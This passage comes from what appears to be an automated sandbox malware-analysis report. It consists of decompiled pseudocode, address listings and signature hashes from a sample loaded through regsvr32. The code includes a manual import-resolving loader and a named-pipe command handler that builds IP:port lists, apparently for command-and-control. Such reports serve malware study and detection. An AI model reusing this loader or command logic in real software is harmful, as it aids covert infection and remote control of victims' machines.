            0x03173f83
            0x03173f93
            0x03173fb6
            0x03173fc8
            0x03173f95
            0x03173fa9
            0x03173fa9
            0x03173fd2
            0x03173fee
            0x03173fd4
            0x03173fe3
            0x03173fe3
            0x03173ff6
            0x03173fff
            0x03173fff
            0x0317400d
            0x00000000
            0x03173f56
            0x03173f58
            0x00000000
            0x03173f58
            0x03173f54
            0x00000000
            0x03173f17
            0x03173dfa
            0x03173e08
            0x03173e0d
            0x03173e18
            0x03173e1b
            0x03173e1f
            0x03173e21
            0x03173e31
            0x03173e3a
            0x03173e43
            0x03173e4b
            0x03173e54
            0x03173e5f
            0x03173e65
            0x03173e68
            0x03173e6b
            0x03173e72
            0x03173e79
            0x00000000
            0x00000000
            0x03173e84
            0x03173e92
            0x03173e9d
            0x03173ea7
            0x03173ebf
            0x03173ecc
            0x03173ecc
            0x03173ea9
            0x03173eb4
            0x03173eb4
            0x03173ed3
            0x03173ed3
            0x03173edb
            0x03173edb
            0x00000000

            APIs
            • GetModuleHandleA.KERNEL32(00000000), ref: 03173F2E
            • LoadLibraryA.KERNEL32(00000000), ref: 03173F47
            • GetProcAddress.KERNEL32(00000000,?), ref: 03173FA3
            • GetProcAddress.KERNEL32(00000000,?), ref: 03173FC2
            • lstrcmpA.KERNEL32(?,00000000), ref: 031740B3
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: AddressProc$HandleLibraryLoadModulelstrcmp
            • String ID:
            • API String ID: 1872726118-0
            • Opcode ID: a7eb2d6fc525461c5d54da9ed6ed44e299ceb909318693e75b46f51324b10248
            • Instruction ID: b421b0696326e9acc12e6aa969aeffee4a25e2e291a1d3e1b44c751c69ba62c5
            • Opcode Fuzzy Hash: a7eb2d6fc525461c5d54da9ed6ed44e299ceb909318693e75b46f51324b10248
            • Instruction Fuzzy Hash: D5E1A074A10209DFCB14CFA9C884AADBBF1BF0C354F198559E825EB351DB34A995CF90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 03171A0A Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: @$\u%04X$\u%04X\u%04X
            • API String ID: 0-2132903582
            • Opcode ID: acac5f7a0e95c6105f8d06dc64b26d212ea358fbce792b0f9088508cc9e466a9
            • Instruction ID: 0b61634a91e182486d465ab7ccb174c883dc3d5b0be66c70dffcf468679b293e
            • Opcode Fuzzy Hash: acac5f7a0e95c6105f8d06dc64b26d212ea358fbce792b0f9088508cc9e466a9
            • Instruction Fuzzy Hash: 1041D431A40249BBDB28DD688D9EABE7639EF4C624F1C0176FD12E7640E361C9E482D1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 031733DA Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85stringCOMMON
            Download Yara Rule
            C-Code - Quality: 83%
            			E031733DA(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				signed int _t23;
				void* _t30;
				char* _t31;
				char* _t33;
				char* _t35;
				char* _t37;
				char* _t38;
				long long* _t40;

				_t30 = __edi;
				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t35 = _a4;
				_push(_t25);
				 *_t40 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t35);
				L03173533();
				_t23 = _t12;
				if(_t23 < 0 || _t23 >= _a8) {
					L16:
					_t13 = _t12 | 0xffffffff;
					goto L17;
				} else {
					E031733B3(_t12, _t35);
					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
						L8:
						_push(_t30);
						_t37 = strchr(_t35, 0x65);
						_t31 = _t37;
						if(_t37 == 0) {
							L15:
							_t13 = _t23;
							L17:
							return _t13;
						}
						_t38 = _t37 + 1;
						_t33 = _t31 + 2;
						if( *_t38 == 0x2d) {
							_t38 = _t33;
						}
						while( *_t33 == 0x30) {
							_t33 = _t33 + 1;
						}
						if(_t33 != _t38) {
							E03168ECB(_t38, _t33, _t23 - _t33 + _a4);
							_t23 = _t23 + _t38 - _t33;
						}
						goto L15;
					} else {
						_t6 = _t23 + 3; // 0x3171bc5
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L16;
						}
						_t35[_t23] = 0x302e;
						( &(_t35[2]))[_t23] = 0;
						_t23 = _t23 + 2;
						goto L8;
					}
				}
			}













            0x031733da
            0x031733dd
            0x031733e2
            0x031733e6
            0x031733e6
            0x031733ec
            0x031733f0
            0x031733f1
            0x031733f4
            0x031733f5
            0x031733fa
            0x031733fd
            0x031733fe
            0x03173403
            0x0317340a
            0x03173493
            0x03173493
            0x00000000
            0x03173415
            0x03173416
            0x03173428
            0x0317344e
            0x0317344e
            0x03173457
            0x03173459
            0x0317345f
            0x0317348e
            0x0317348e
            0x03173496
            0x03173499
            0x03173499
            0x03173461
            0x03173462
            0x03173468
            0x0317346a
            0x0317346a
            0x0317346f
            0x0317346e
            0x0317346e
            0x03173476
            0x03173482
            0x0317348c
            0x0317348c
            0x00000000
            0x03173438
            0x03173438
            0x03173438
            0x0317343e
            0x00000000
            0x00000000
            0x03173440
            0x03173446
            0x0317344b
            0x00000000
            0x0317344b
            0x03173428

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: strchr$_snprintf
            • String ID: %.*g
            • API String ID: 3619936089-952554281
            • Opcode ID: f6ff1893ced5d9b9b0041d6c38e8925e1300bb68c89727643d4361be5cae1ae1
            • Instruction ID: 61ccea0782b1537abfc034fb707e20e6972be353f43972323fe7cfa1a10c4094
            • Opcode Fuzzy Hash: f6ff1893ced5d9b9b0041d6c38e8925e1300bb68c89727643d4361be5cae1ae1
            • Instruction Fuzzy Hash: 9B218B2A600714A7DB2BDE1CEC85BAE77BC9F0C760F1C0864F8668A180E7A5D94063D5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 03163775 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 310pipeCOMMON
            Download Yara Rule
            C-Code - Quality: 62%
            			E03163775(void* __fp0) {
				signed int _v144;
				signed int _v152;
				char _v160;
				char _v164;
				char _v168;
				signed int _v172;
				char _v176;
				intOrPtr _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				char _v200;
				signed int _v204;
				intOrPtr _t72;
				intOrPtr _t75;
				signed int _t80;
				signed int _t81;
				signed int _t84;
				signed int _t87;
				signed int _t88;
				signed int _t100;
				void* _t102;
				void* _t103;
				unsigned int* _t104;
				signed int _t110;
				signed int _t113;
				void* _t118;
				intOrPtr _t124;
				signed int _t127;
				intOrPtr _t129;
				intOrPtr _t132;
				void* _t133;
				void* _t136;
				signed int _t145;
				signed int _t147;
				signed short* _t148;
				signed int _t158;
				intOrPtr* _t182;
				void* _t186;
				void* _t187;
				void* _t188;
				signed short* _t191;
				void* _t195;
				signed int _t198;
				signed int _t199;
				signed int _t203;
				signed int _t204;
				char _t205;
				signed int _t207;
				void* _t209;
				void* _t215;
				void* _t222;

				_t222 = __fp0;
				_t209 = (_t207 & 0xfffffff8) - 0xac;
				_v144 = 0;
				_v172 = 0;
				while(1) {
					_t72 =  *0x317f8d0; // 0x4faf8c0
					_push(0);
					_push( *0x317f8b4);
					_v152 = 0;
					if( *((intOrPtr*)(_t72 + 0xe0))() == 0 && GetLastError() != 0x217) {
						break;
					}
					_push(0);
					_push( &_v160);
					_t75 =  *0x317f8d0; // 0x4faf8c0
					_push(0x80000);
					_push( *0x317f974);
					_push( *0x317f8b4);
					if( *((intOrPtr*)(_t75 + 0x90))() == 0 || _v180 == 0) {
						GetLastError();
						goto L56;
					} else {
						_t148 =  *0x317f974; // 0x0
						_t80 =  *_t148 & 0x0000ffff;
						_t215 = _t80 - 8;
						if(_t215 > 0) {
							_t81 = _t80 - 9;
							__eflags = _t81;
							if(_t81 == 0) {
								E031709C3( &_v200);
								L12:
								_t84 =  &_v200;
								L13:
								_push(4);
								L14:
								_push(_t84);
								_push(5);
								L31:
								_pop(_t186);
								E0316D297(_t186);
								L32:
								L56:
								DisconnectNamedPipe( *0x317f8b4);
								_push(0);
								_pop(0);
								_push(1);
								_pop(1);
								if(_v172 == 0) {
									continue;
								}
								break;
							}
							_t87 = _t81;
							__eflags = _t87;
							if(_t87 == 0) {
								_v204 = 0;
								_t88 = E031616B0( &_v204, _t222);
								_v188 = _t88;
								__eflags = _t88;
								if(_t88 == 0) {
									_push(4);
									_v192 = 0;
									_push( &_v192);
									L19:
									_push(0xa);
									goto L31;
								}
								_t145 = _v204;
								_t90 = _t145 * 0x16;
								_v184 = _t145 * 0x16;
								_t203 = E03168DC9(_t90);
								_v192 = _t203;
								__eflags = _t203;
								if(_t203 == 0) {
									_t64 =  &_v192;
									 *_t64 = _v192 & 0x00000000;
									__eflags =  *_t64;
									_push(4);
									_push( &_v192);
									_t187 = 0xa;
									E0316D297(_t187);
									L52:
									E03168DDF( &_v188, _t145);
									goto L32;
								}
								_t198 = 0;
								__eflags = _t145;
								if(_t145 == 0) {
									L50:
									_push(E0316A5D0(_t203));
									_push(_t203);
									_t188 = 5;
									E0316D297(_t188);
									E03168DDF( &_v192, 0xffffffff);
									_t209 = _t209 + 0x10;
									goto L52;
								}
								_t158 = _v188 + 4;
								__eflags = _t158;
								_v204 = _t158;
								do {
									__eflags = _t198;
									if(_t198 != 0) {
										__eflags = _t198 - _t145 - 1;
										if(_t198 < _t145 - 1) {
											_t102 = E0316A5D0(_t203);
											_t158 = _v204;
											 *((short*)(_t102 + _t203)) = 0x3b;
										}
									}
									_t100 =  *_t158;
									_v196 = _t100;
									__eflags = _t100;
									if(_t100 != 0) {
										_t103 = E0316A5D0(_t203);
										_t104 = _v204;
										_push(_t104[1] & 0x0000ffff);
										_push( *_t104 >> 0x18);
										_push(_t104[0] & 0x000000ff);
										_push(_t104[0] & 0x000000ff);
										_t110 = E0316A5D0(_t203) + _t203;
										__eflags = _t110;
										E03169FA5(_t110, _v184 - _t103, "%u.%u.%u.%u:%u", _v196 & 0x000000ff);
										_t158 = _v204;
										_t209 = _t209 + 0x20;
									}
									_t198 = _t198 + 1;
									_t158 = _t158 + 0x20;
									_v204 = _t158;
									__eflags = _t198 - _t145;
								} while (_t198 < _t145);
								goto L50;
							}
							__eflags = _t87 != 1;
							if(_t87 != 1) {
								goto L56;
							}
							_v204 = 0;
							_t113 = E031616B0( &_v204, _t222);
							_t204 = _v204;
							_v196 = _t113;
							__eflags = _t113;
							if(_t113 != 0) {
								E03168DDF( &_v196, _t204);
							}
							_v204 = _t204 * 0x16;
							_t84 =  &_v204;
							goto L13;
						}
						if(_t215 == 0) {
							_t84 = E031709C3( &_v200);
							L16:
							__eflags = _t84;
							if(_t84 == 0) {
								_push(0);
								_push(0);
								goto L19;
							}
							_push(_v200);
							goto L14;
						}
						_t118 = _t80 - 1;
						if(_t118 == 0) {
							_t199 = E03169D29( &(_t148[4]), 0x20, 1,  &_v176);
							_v196 = _t199;
							__eflags = _t199;
							if(_t199 == 0) {
								L30:
								_t191 =  *0x317f974; // 0x0
								E0316A06E( &_v164,  &(_t191[4]), 0x80);
								_push(0x84);
								_push( &_v168);
								_push(2);
								goto L31;
							}
							_t205 = _v176;
							__eflags = _t205 - 1;
							if(__eflags <= 0) {
								_t124 = E03161D97(E0316A102( *_t199, __eflags), 0, 0, 0);
								_t209 = _t209 + 0x10;
								_v168 = _t124;
								goto L30;
							}
							_t125 = _t205 - 1;
							_v184 = _t205 - 1;
							_t127 = E03168DC9(_t125 << 2);
							_v188 = _t127;
							__eflags = _t127;
							if(_t127 == 0) {
								goto L30;
							}
							_t147 = 1;
							__eflags = _t205 - 1;
							if(__eflags <= 0) {
								L28:
								_t129 = E03161D97(E0316A102( *_t199, __eflags), _t127, _v184, 0);
								_t209 = _t209 + 0x10;
								_v168 = _t129;
								E03169E22( &_v176);
								goto L30;
							}
							_v204 = _t127;
							do {
								_t132 = E03169A76( *((intOrPtr*)(_t199 + _t147 * 4)), E0316A5D0( *((intOrPtr*)(_t199 + _t147 * 4))));
								_t182 = _v204;
								_t147 = _t147 + 1;
								 *_t182 = _t132;
								_v204 = _t182 + 4;
								__eflags = _t147 - _t205;
							} while (__eflags < 0);
							_t127 = _v188;
							goto L28;
						}
						_t133 = _t118 - 3;
						if(_t133 == 0) {
							_push(0);
							_push(0);
							_t195 = 5;
							E0316D297(_t195);
							 *0x317f9a8 = 1;
							_v172 = 1;
							goto L56;
						}
						_t136 = _t133;
						if(_t136 == 0) {
							_t84 = E031709A1( &_v200);
							goto L16;
						}
						if(_t136 != 1) {
							goto L56;
						}
						E031709A1( &_v200);
						goto L12;
					}
				}
				return 0;
			}
























































            0x03163775
            0x0316377b
            0x03163788
            0x0316378d
            0x03163791
            0x03163791
            0x03163796
            0x03163797
            0x0316379d
            0x031637a9
            0x00000000
            0x00000000
            0x031637bc
            0x031637c1
            0x031637c2
            0x031637c7
            0x031637cc
            0x031637d2
            0x031637e0
            0x03163aec
            0x00000000
            0x031637f1
            0x031637f1
            0x031637f7
            0x031637fa
            0x031637fd
            0x0316396b
            0x0316396b
            0x0316396e
            0x03163ae2
            0x0316382c
            0x0316382d
            0x03163831
            0x03163831
            0x03163833
            0x03163833
            0x03163834
            0x0316394f
            0x0316394f
            0x03163950
            0x03163955
            0x03163af2
            0x03163af8
            0x03163b03
            0x03163b05
            0x03163b06
            0x03163b08
            0x03163b09
            0x00000000
            0x00000000
            0x00000000
            0x03163b09
            0x03163975
            0x03163975
            0x03163978
            0x031639bd
            0x031639c1
            0x031639c6
            0x031639ca
            0x031639cc
            0x03163acd
            0x03163ad3
            0x03163ad7
            0x03163852
            0x03163852
            0x00000000
            0x03163852
            0x031639d2
            0x031639d6
            0x031639da
            0x031639e3
            0x031639e5
            0x031639ea
            0x031639ec
            0x03163aa7
            0x03163aa7
            0x03163aa7
            0x03163ab0
            0x03163ab2
            0x03163ab5
            0x03163ab6
            0x03163abd
            0x03163ac3
            0x00000000
            0x03163ac3
            0x031639f2
            0x031639f4
            0x031639f6
            0x03163a85
            0x03163a8c
            0x03163a8d
            0x03163a90
            0x03163a91
            0x03163a9d
            0x03163aa2
            0x00000000
            0x03163aa2
            0x03163a00
            0x03163a00
            0x03163a03
            0x03163a07
            0x03163a07
            0x03163a09
            0x03163a0e
            0x03163a10
            0x03163a13
            0x03163a19
            0x03163a1d
            0x03163a1d
            0x03163a10
            0x03163a23
            0x03163a25
            0x03163a29
            0x03163a2b
            0x03163a2e
            0x03163a35
            0x03163a3e
            0x03163a44
            0x03163a49
            0x03163a52
            0x03163a6a
            0x03163a6a
            0x03163a6d
            0x03163a72
            0x03163a76
            0x03163a76
            0x03163a79
            0x03163a7a
            0x03163a7d
            0x03163a81
            0x03163a81
            0x00000000
            0x03163a07
            0x0316397a
            0x0316397d
            0x00000000
            0x00000000
            0x03163987
            0x0316398b
            0x03163990
            0x03163994
            0x03163998
            0x0316399a
            0x031639a2
            0x031639a8
            0x031639ac
            0x031639b0
            0x00000000
            0x031639b0
            0x03163803
            0x03163961
            0x03163845
            0x03163846
            0x03163848
            0x03163850
            0x03163851
            0x00000000
            0x03163851
            0x0316384a
            0x00000000
            0x0316384a
            0x03163809
            0x0316380c
            0x03163884
            0x03163886
            0x0316388c
            0x0316388e
            0x0316392b
            0x0316392b
            0x0316393d
            0x03163943
            0x0316394c
            0x0316394d
            0x00000000
            0x0316394d
            0x03163894
            0x03163898
            0x0316389b
            0x0316391f
            0x03163924
            0x03163927
            0x00000000
            0x03163927
            0x0316389d
            0x031638a0
            0x031638a8
            0x031638ad
            0x031638b2
            0x031638b4
            0x00000000
            0x00000000
            0x031638b8
            0x031638b9
            0x031638bb
            0x031638ea
            0x031638f9
            0x031638fe
            0x03163901
            0x0316390d
            0x00000000
            0x0316390d
            0x031638bd
            0x031638c1
            0x031638cf
            0x031638d4
            0x031638d8
            0x031638d9
            0x031638de
            0x031638e2
            0x031638e2
            0x031638e6
            0x00000000
            0x031638e6
            0x0316380e
            0x03163811
            0x03163859
            0x0316385a
            0x0316385d
            0x0316385e
            0x03163865
            0x0316386b
            0x00000000
            0x0316386b
            0x03163814
            0x03163817
            0x03163840
            0x00000000
            0x03163840
            0x0316381c
            0x00000000
            0x00000000
            0x03163827
            0x00000000
            0x03163827
            0x031637e0
            0x03163b17

            APIs
            • GetLastError.KERNEL32 ref: 031637AB
              • Part of subcall function 0316D297: FlushFileBuffers.KERNEL32(00000000,?,03163ABB,00000000,00000004), ref: 0316D2DD
            • DisconnectNamedPipe.KERNEL32 ref: 03163AF8
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: BuffersDisconnectErrorFileFlushLastNamedPipe
            • String ID: %u.%u.%u.%u:%u
            • API String ID: 465096328-3858738763
            • Opcode ID: d450250336eef9c0104b162a15f9b0ca6e177ad1fc79dadb8e9768a06352cc3f
            • Instruction ID: 71640700cbe53df89141bfec963ed72620fec1f50c779b8300d29103a39a59bc
            • Opcode Fuzzy Hash: d450250336eef9c0104b162a15f9b0ca6e177ad1fc79dadb8e9768a06352cc3f
            • Instruction Fuzzy Hash: 22A1717A508301AFD314EFA4D884A6BB7ECEF8C314F084D1EF565DA190DB34D9658B61
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0317376C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151libraryCOMMON
            Download Yara Rule
            C-Code - Quality: 50%
            			E0317376C(signed int __eax, void* __ecx, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				void* _t163;
				void* _t167;

				_t167 = __ecx;
				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E0316F024(_t167, _v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t34 = _v8 + 0xc; // 0xffff
						_v36 = LoadLibraryA( *_t34 + _a4);
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_t43 = _v8 + 0x10; // 0xb8
								_v12 =  *_t43 + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_t73 = _v8 + 0x10; // 0xb8
									_v24 =  *((intOrPtr*)( *_t73 + _a4 + _v28));
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										_t89 = _v8 + 0x10; // 0xb8
										 *( *_t89 + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}























            0x0317376c
            0x03173772
            0x0317377a
            0x0317378f
            0x031737a1
            0x031737ad
            0x031737b3
            0x031737b8
            0x031737c4
            0x0317392f
            0x00000000
            0x0317392f
            0x031737ca
            0x031737d3
            0x031737e1
            0x031737e4
            0x031737f3
            0x031737f3
            0x031737fa
            0x03173808
            0x0317380b
            0x0317381b
            0x03173828
            0x0317382f
            0x0317383f
            0x03173851
            0x03173857
            0x03173841
            0x03173849
            0x03173849
            0x0317385a
            0x0317385e
            0x0317386a
            0x0317386e
            0x03173872
            0x03173876
            0x03173882
            0x031738ad
            0x031738b5
            0x031738bb
            0x031738c7
            0x031738d3
            0x03173884
            0x03173889
            0x03173894
            0x031738a0
            0x031738a0
            0x031738dc
            0x031738e2
            0x031738ec
            0x03173908
            0x031738ee
            0x031738f1
            0x031738fd
            0x031738fd
            0x031738ec
            0x03173910
            0x03173919
            0x03173919
            0x03173927
            0x00000000
            0x03173927
            0x03173833
            0x00000000
            0x03173833
            0x00000000
            0x0317380b
            0x00000000

            APIs
            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 03173789
            • LoadLibraryA.KERNEL32(00000000), ref: 03173822
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: HandleLibraryLoadModule
            • String ID: GetProcAddress$kernel32.dll
            • API String ID: 4133054770-1584408056
            • Opcode ID: db6d12e7b2a6b2644d89b0bf927364cb418ce0b3146a58b1244974659a882714
            • Instruction ID: 2755a6eed7b06d08478b98af5b226fdd0adbea621ba78282938b543a3b48d047
            • Opcode Fuzzy Hash: db6d12e7b2a6b2644d89b0bf927364cb418ce0b3146a58b1244974659a882714
            • Instruction Fuzzy Hash: 18617F79D00209EFDB04CF98C485BADBBF1FF08315F288599E465AB291D774AA81DF90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 03174160 Relevance: 6.6, APIs: 5, Instructions: 341COMMON
            Download Yara Rule
            C-Code - Quality: 99%
            			E03174160(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x5d08408b
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0x51ec8b55
					_t12 = _t272 + 0x5c; // 0xee85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E03177180(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E03175EE0(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0xee85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E03176020( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0x51ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0x51ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0x8508458b
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0x51ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0x51ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0x830a74c0
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
